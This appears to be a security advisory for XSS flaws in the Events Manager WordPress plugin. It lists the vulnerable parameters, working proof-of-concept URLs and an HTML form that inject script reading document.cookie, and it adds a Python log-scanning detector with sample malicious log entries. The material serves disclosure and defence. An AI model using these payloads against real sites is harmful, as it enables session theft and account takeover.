CVSS2: 4.3 Medium
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
EPSS: 0.002 Low (percentile 60.5%)
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in the Events Manager WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks.
1.2 The vulnerability exists due to insufficient filtration of user-supplied data in the “_wpnonce” HTTP GET parameter passed to the “/wp-admin/edit.php” script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The PoC (Proof-of-Concept) below uses the “alert()” JavaScript function to display the administrator’s cookies:
http://[host]/wp-admin/edit.php?post_type=event&page=events-manager-bookings&_wpnonce=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in the “user_name”, “dbem_phone” and “user_email” HTTP GET parameters passed to the “/index.php” script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The PoCs (Proof-of-Concept) below use the “alert()” JavaScript function to display the user’s cookies:
http://[host]/?event=1&user_name=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/?event=1&dbem_phone=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/?event=1&user_email=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.4 The vulnerability exists due to insufficient filtration of user-supplied data in the “booking_comment” HTTP POST parameter passed to the “/index.php” script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The PoC (Proof-of-Concept) below uses the “alert()” JavaScript function to display the user’s cookies:
<form action="http://[host]/?event=1" method="post" name="askform">
<input type="hidden" name="booking_comment" value="</textarea><script>alert(document.cookie);</script>"/>
<input type="submit" id="btn">
</form>
Vulnerabilities 1.3 and 1.4 will work only against unauthorized (not logged-in) users. Successful exploitation of these vulnerabilities also requires that the event with id = 1 has registration turned on.
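Detection logic for the GET vectors in 1.2 and 1.3, added here as an example and not part of the original advisory: it scans web server access log lines for the parameters named above and reports values that carry markup-breaking characters. The combined log format, the 10-character hex nonce shape and the sample log entries are assumptions; the POST parameter in 1.4 does not appear in a standard access log and is not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# GET parameters named in the advisory, keyed by the path that receives them.
INDEX_PARAMS = {"user_name", "dbem_phone", "user_email"}
WATCHED = {"/wp-admin/edit.php": {"_wpnonce"}, "/": INDEX_PARAMS, "/index.php": INDEX_PARAMS}

# Assumption: a genuine WordPress nonce is a 10-character hex token.
NONCE_OK = re.compile(r"[0-9a-f]{10}")
# Angle brackets or a double quote anywhere; a single quote only when followed by
# '>' or '=', so a name such as O'Brien is not reported.
MARKUP = re.compile(r"[<>\"]|'.*[>=]", re.S)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_requests(log_lines):
    """Return (path, parameter, decoded value) for watched parameters carrying markup."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        watched = WATCHED.get(url.path, set())
        # parse_qsl percent-decodes each value once before it is inspected.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name not in watched:
                continue
            if name == "_wpnonce":
                bad = NONCE_OK.fullmatch(value) is None
            else:
                bad = MARKUP.search(value) is not None
            if bad:
                hits.append((url.path, name, value))
    return hits

# Constructed sample entries (documentation IP ranges, made-up nonce value).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2014:10:00:00 +0000] "GET /wp-admin/edit.php?post_type=event&page=events-manager-bookings&_wpnonce=3f9a1c07be HTTP/1.1" 200 8120',
    '198.51.100.9 - - [01/Jan/2014:10:02:11 +0000] "GET /wp-admin/edit.php?post_type=event&page=events-manager-bookings&_wpnonce=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 8342',
    '203.0.113.5 - - [01/Jan/2014:10:05:40 +0000] "GET /?event=1&user_name=O%27Brien&user_email=ob%40example.org HTTP/1.1" 200 5120',
    '203.0.113.8 - - [01/Jan/2014:10:06:02 +0000] "GET /?event=1&dbem_phone=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 5188',
]

if __name__ == "__main__":
    for path, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{path}  {name} = {value!r}")
```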
| CPE | Name | Operator | Version |
|---|---|---|---|
| | events manager wordpress plugin | le | 5.3.3 |